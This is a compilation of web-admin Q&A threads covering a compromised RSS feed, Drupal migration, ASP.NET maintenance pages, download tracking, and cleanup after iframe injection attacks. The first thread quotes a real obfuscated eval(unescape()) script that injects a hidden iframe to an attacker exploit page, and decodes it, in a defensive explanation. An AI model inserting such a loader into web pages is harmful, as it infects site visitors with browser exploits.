RSS won't update

My feed is broken: Feed Validator says this portion is the problem. Any thoughts?
]]></content:encoded>
<wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/</wfw:commentRss>
<slash:comments>2</slash:comments>
</item>
</channel>
</rss>
<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>

<script language="javascript">eval(unescape("%64%6F%63...
You've been hacked. An attacker has compromised your site and added this script to the bottom of some of your pages (probably all of them, judging by your main site). It loads a bunch of exploit code against web browsers and plugins in an attempt to infect other people's computers. The fact that it also makes the RSS invalid is just a side-effect.
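For the curious, you can decode the escaped blob yourself; here's a quick Python sketch (the payload string is copied straight from the feed above):

import urllib.parse

# The escaped blob from the injected script tag
payload = (
    "%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65"
    "%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78"
    "%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31"
    "%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"
)
print(urllib.parse.unquote(payload))
# -> document.write('<iframe src="http://iss9w8s89xx.org/in.php" width=1 height=1 frameborder=0></iframe>');

It writes a hidden 1x1 iframe pointing at the attacker's exploit page.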
You need to take the site offline before it infects more people, then work on the clean-up, which will depend on how they compromised it and what kind of server it is. At the very least you will need to delete your current site code and upload fresh scripts, from a machine you know is clean(*), with all your passwords changed. If it's your own [virtual] server, you will also need to check that the server itself hasn't been rooted.
(*: a very common way sites are getting compromised at the moment is through hacked client machines running FTP clients. The trojans steal the FTP passwords when you connect. So you need to check and disinfect every machine you might have used to connect to the site. And if you find anything suspicious on one of them, don't trust AV tools to completely clean it, because today they just can't keep up with the quantity of malcode out there. Re-install the operating system instead.)


Drupal multi-site to single-site go-live

I have a colleague asking me to provide a single tarball containing an entire Drupal site, which they can drop on their server with no configuration beyond connecting the database.
To my knowledge this is not possible.
To further complicate the issue, the site is currently developed as a multi-site install and the colleague needs it provided as a single-site install. This is a conversion I've done countless times, but I've always completed the process on the destination environment, because Drupal multi-sites need a proper domain pointed at them to function. There's no way for me to confirm that the site will work at the new location without actually testing it on that environment first, so I don't think I can fulfill this request.
Am I missing something? Is this in fact possible to achieve?
I don't see why this isn't possible.
As for the drop-in install: as long as you include the settings.php file and a copy of the DB for them to import, that's all they should need, provided their web server is configured properly (pretty URLs and the like). There are a few considerations, though: make sure the DB connection settings are written relative to localhost (or however they have it set up), and when you build the tarball, make sure the file permissions are right for the destination machine. Otherwise, moving a Drupal install really isn't that difficult, and it can be just that simple.
Depending on how 'drop in' they want it, you could write a little script to automate and verify the install: have it import a copy of the DB, redo the permissions and ownership of the files on the destination host, and reload Apache.
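As a rough illustration, such a script might look like this (a Python sketch assuming a typical LAMP host; the database name, dump file, web root and web user are placeholders for whatever the destination actually uses):

import subprocess

DB_NAME = "drupal"               # placeholder database name
DUMP_FILE = "drupal.sql"         # DB dump shipped inside the tarball
DOCROOT = "/var/www/html"        # destination web root
WEB_USER = "www-data:www-data"   # web server user/group on the host

# Import the database dump
subprocess.run(f"mysql {DB_NAME} < {DUMP_FILE}", shell=True, check=True)

# Redo ownership so the web server can read the files
subprocess.run(["chown", "-R", WEB_USER, DOCROOT], check=True)

# Reload Apache to pick up the new site
subprocess.run(["apachectl", "graceful"], check=True)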
As far as the multi-site to single-site conversion is concerned, I would just do it in a sandbox and point the destination domain at it in /etc/hosts (a line like 127.0.0.1 newsite.example.com). This simulates the destination domain well enough that you can make sure the install works before sending it off.
Hope that helps.

How do I take a .NET site down for maintenance?

I have an ASP.NET site that I'm going to have to take down to make some major structural updates to, and I was wondering how I should go about it from the client-side perspective. I have heard of an App_Offline.htm file or something like that, but I've never really gotten that to successfully work. Does anyone know how to do this?
EDIT
My app is running ASP.NET 4.0, for what it is worth.
Rather than messing with the app_offline silliness (among other reasons, you can't continue to see the site internally while performing maintenance), I created an additional "down for maintenance" site in IIS, which is normally stopped. It has the same IP, host headers, etc as the main site, but only has a default.aspx, an images folder and a stylesheet. That file contains the "This site will be down for maintenance until xx:xx PM CST" message.
When I'm ready to perform the update, I stop the main site and start the maintenance site, which then processes any requests it receives and, of course, returns the maintenance message.
When the maintenance is complete, stop the maintenance placeholder site, and restart your main site.
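If you'd rather script the swap than click through IIS Manager, appcmd on IIS 7 or later can stop and start the sites (the site names here are made up):

%windir%\system32\inetsrv\appcmd stop site /site.name:"Main Site"
%windir%\system32\inetsrv\appcmd start site /site.name:"Maintenance Site"

Run the same pair in reverse when the maintenance is done.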
If you're using host headers, you can modify this approach so that the site remains internally accessible over your LAN/WAN while the maintenance site is handling external requests. A simple approach is to remove the host headers for <*>.yourdomain.com from the main site before starting the maintenance site, and ensure that the main site has an additional host header that is internally accessible (added to your local hosts file, for instance). When you start the maintenance site, it'll handle external requests while the primary site will handle requests to the internal-only header.
Alternatively (this seems complex, but saves you the trouble of adding and removing headers), create three sites:
Main site: Configured as in normal operation.
Maintenance site: Has same IP, host headers, etc as main site, but only contains default "down for maintenance" page and any images, css, etc that are required.
Internal test site: Duplicates the configuration of the main site and points to the same folders, but only has host headers,etc for an internal name that is not in the public DNS.
This way, you have only to stop the main site and start the other two in order to funnel external traffic to the "down for maintenance" site, while you can still see and tweak the primary site. This is helpful for that last few minutes of testing/bug fixing that tends to come up during a deployment.
Update
If you don't have access to the server or IIS Manager, you most likely won't be able to use any of that. Assuming that your access is limited to your own folder, your options seem to be either to deploy app_offline.htm to the root of the site (ASP.NET checks for that filename), or to just replace the whole site with a "down for maintenance" app. Perhaps someone else will chime in with alternatives.
The trick for IE is to push a particular number of bytes over the wire (more than 512), otherwise IE substitutes its own not-so-friendly error page anyway. More details here: http://weblogs.asp.net/scottgu/archive/2006/04/09/442332.aspx
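A minimal App_Offline.htm along those lines might look like this (the wording is just an example; the padding comment exists only to push the response past IE's 512-byte threshold):

<html>
<head><title>Down for maintenance</title></head>
<body>
<h1>Down for maintenance</h1>
<p>This site will be down for maintenance until 9:00 PM CST.</p>
<!-- Padding so the response exceeds 512 bytes and IE doesn't swap in
     its "friendly" error page: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx -->
</body>
</html>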
If you have a good pre-release testing process and careful release procedures you probably won't be down for long.
In that case dropping a file called App_Offline.htm into your site root works fine. IIS will replace your site with it until you remove it. It's a painless way of making sure nothing's updating while you transition.
Mine just has a header with the site logo and a message that we'll be down for maintenance for up to twenty minutes. That's it. It took me about five minutes to write IIRC.
I would definitely recommend this for short sharp down periods of less than half an hour. Anything longer and you're probably looking at a major system change that warrants an approach like David Lively's.

How to track a completed file download in ASP.NET

I have this ASP.NET web site that allows users to download program installation packages (just normal files). I want to be able to track when a download is completed (i.e. the file has been fully downloaded to the user's computer) and then invoke a Google Analytics script that reports a completed download as a 'Goal' (obviously, one of my goals is to increase file downloads).
The problem is that I need to support direct file URLs, as opposed to the "redirect page" solution. This is because a lot of traffic comes from software download sites that explicitly demand a direct file URL when submitting a product. Perhaps they do their own file analysis (e.g. virus checking). But with this set of limitations, a typical scenario is:
The user visits my product listing on a software download site
The user clicks the "Download" button on this site
The "Download" page is typically a redirect that finally brings the user to my file via the direct URL I've initially submitted, i.e. http://www.ko-sw.com/somefile.exe
If under these conditions, an exact solution for monitoring is not possible, maybe there exists a workaround? What comes to my mind is temporarily storing the number of performed downloads on the server and then accessing an administrative page that somehow reports this number to Google Analytics and finally sets it back to zero. With this workaround, there is at least no need to try to attach a javascript handler to a non-HTML resource. But even then there are issues:
How to track if a download has completed?
How to track user geolocation and browser capabilities to make them further visible in the reports?
Thanks everybody in advance
According to awstats, an aborted download is logged with HTTP status code 206, so if you analyze the server log for that code you can identify the downloads that were not completed.
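A quick sketch of that analysis (Python, assuming an Apache-style access log; the log path and file name are placeholders):

from collections import Counter

statuses = Counter()
with open("/var/log/apache2/access.log") as log:
    for line in log:
        if "/somefile.exe" in line:      # the download being tracked
            fields = line.split()
            if len(fields) > 8:
                statuses[fields[8]] += 1  # status code field in common log format
# 206 responses are the partial (aborted or resumed) transfers
print(statuses.get("200", 0), "complete,", statuses.get("206", 0), "partial")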
@Kerido ~ I'm curious what the business case is here. Are you trying to track installs or downloads? If installs, go with @SamMeiers' solution.
However, if you're trying to track downloads, then the next question is what webserver base are you using? IIS? Apache? Something else?
In IIS, assuming you're using 7 (or later), you could (easily?) write an HttpHandler that checks for the last bytes of the file being sent and, at that point, records a log entry somewhere.
On Apache, just set up logging to tell you how many bytes were transferred (a trivial change in httpd.conf), then parse the logs daily (awstats [amongst others] is pretty good for this, but you might have to write a sed/awk script) and find out how many full transfers were completed. It just depends on how thorough you're trying to be.
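For the thorough end of that spectrum, here's a sketch that counts only transfers whose byte count matches the full file size (the file name, size and log path are placeholders):

FILE_SIZE = 3_145_728  # full size of somefile.exe in bytes (made up)

completed = 0
with open("/var/log/apache2/access.log") as log:
    for line in log:
        if "/somefile.exe" not in line:
            continue
        fields = line.split()
        # common log format: ... "GET /somefile.exe HTTP/1.1" status bytes
        if len(fields) > 9 and fields[8] == "200" and fields[9].isdigit():
            if int(fields[9]) == FILE_SIZE:
                completed += 1
print(completed, "completed downloads")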
But I go back to, what's the business case for this? What does it matter if there were unfinished downloads?
It's possible to track links as a goal, which may be of use to you. However, this won't track when the download was completed.
http://www.google.com/support/analytics/bin/answer.py?answer=55529
Hope this helps.
Cheers
Tigger
I think @SamMeiers' solution is very good, but you can improve on it by having the installer call a web service once installation completes. One small problem: the user may be installing the app in an environment without internet access, so the installer should check for connectivity first.
You can also write a flag when the installation starts; when it finishes, check that the start flag exists, and you then know the app was both downloaded and installed.
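A sketch of that post-install call (Python as a stand-in for whatever the installer runs; the endpoint path is hypothetical):

import urllib.request

def report_install_complete():
    """Ping the tracking endpoint; stay silent if there's no internet."""
    try:
        urllib.request.urlopen(
            "http://www.ko-sw.com/track/install-complete",  # hypothetical endpoint
            timeout=5,
        )
    except OSError:
        pass  # offline install: skip reporting rather than fail

report_install_complete()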

How to prevent Iframe hack

My site is hosted at Lunarpages, and it has been getting hacked for a few months now.
I have done everything the various guides suggest (changing passwords and the like).
Finally, two weeks ago, I blocked all ranges of Chinese IPs.
But today it was hacked again.
Is there any way to prevent the iframe hack?
If you're changing your passwords and the site still gets hacked, you might have a virus on your machine. I am not joking, I saw this once.
Just to make sure, request the FTP logs from your hosting provider (you may see other machines connecting to your account).
Given your comment

"Iframe hack is famous SQL injection attack, mainly from .cn domains"
Identify SQL injection vulnerabilities in your system
Close them (switching to parametrised queries is a good idea if you haven't already; see the sketch below)
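To illustrate the parametrised-query idea (Python and sqlite3 here purely for demonstration; in classic ASP/ADO the equivalent mechanism is the Command object's Parameters collection):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE posts (title TEXT, author TEXT)")
conn.execute("INSERT INTO posts VALUES ('Hello world', 'alice')")

hostile = "alice'; DROP TABLE posts; --"  # classic injection attempt

# The ? placeholder binds the input as data, never as SQL text,
# so the DROP TABLE never executes
rows = conn.execute(
    "SELECT title FROM posts WHERE author = ?", (hostile,)
).fetchall()
print(rows)  # [] -- no match, and the table is still intact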
You could also use mod_security or similar to try to stop attacks before they get to your web application. I've experienced false positives though (as a user, and only with ASP.NET systems (note this is a tiny sample size)).
The question isn't so much about the iframe as how it got there and how to get rid of it. I believe what has happened is that you have stored your passwords in your FTP client. You have a trojan on your computer and it mines the passwords from the FTP client and then uploads the iframe to your index file. Also check your 404 file, if you have one. It will likely be there, too.
Here's what you need to do. First, get rid of the trojan on your computer. I suggest searching for "PWS:Win32/Daurso.gen!A" and deleting it. Then go to your site(s) and remove the iframe from all pages. Next, change all of your passwords. Lastly, do not store the new passwords in your FTP client or anywhere else on your computer.
By the way, don't visit the URL listed in the iframe. It loads a ton of spyware. To get rid of spyware, I suggest using Malwarebytes (free). Use the full scan when you have time. It takes a long time (hours), if you have a lot of files.
Good luck.

Do you know any tools to remove badware, malware from my website which google blocks?

I have a website which Google blocked because it had badware. I removed the viruses from the server and it's completely clean now. The problem is that this virus made changes to the html, js and asp files on the site, adding hidden iframes and strange scripts. I removed everything I found in the files, but the website is too big, so does anyone have a tool I can use to remove all the effects of this badware?
Google gave me this site as a reference for removing the badware from my site:
http://www.stopbadware.org/home/security
Thanks,
Wipe everything from the server, check all the files, and re-upload them if they're clean. That's the only thing you can do.
Upload the latest version of the site from your source control DB. If you don't use source control, it's high time you started. ;-)
Find a good search-and-replace tool. If you are using Dreamweaver, you can do a site-wide search; the same applies to Visual InterDev.
+1 William's comment. You can do a simple grep for characteristic strings your particular infection has left behind, such as “<iframe” or the start of the encoded scripts, but you can't be sure to find all the changes that have happened without a manual inspection. This is what having a clean copy on your local computer is for.
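A sketch of that kind of sweep (Python; the directory and marker list are placeholders to adapt to your own infection):

import os

MARKERS = ["<iframe", "eval(unescape("]  # strings this infection left behind
SITE_DIR = "site-copy"                   # local copy of the site

for root, _dirs, files in os.walk(SITE_DIR):
    for name in files:
        if not name.endswith((".html", ".htm", ".js", ".asp")):
            continue
        path = os.path.join(root, name)
        with open(path, encoding="utf-8", errors="ignore") as f:
            text = f.read()
        for marker in MARKERS:
            if marker in text:
                print(f"{path}: contains {marker!r}")

Note that "<iframe" will also flag legitimate iframes, which is exactly why this only narrows the search rather than replacing a manual inspection.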
i removed the viruses from the server
Really? Are you clean of rootkits? How can you be sure? After an infection, the only sure-fire way to recover a clean server is to reinstall everything on it from the operating system upwards.
Have you discovered and fixed the method the intruders used to get in? If not, you can be sure another of the Russian malware gangs' automated exploits will be back soon enough.
Try soswebscan.
You can scan your website free of charge with soswebscan.
For more details, visit the soswebscan website: http://soswebscan.jobandproject.com
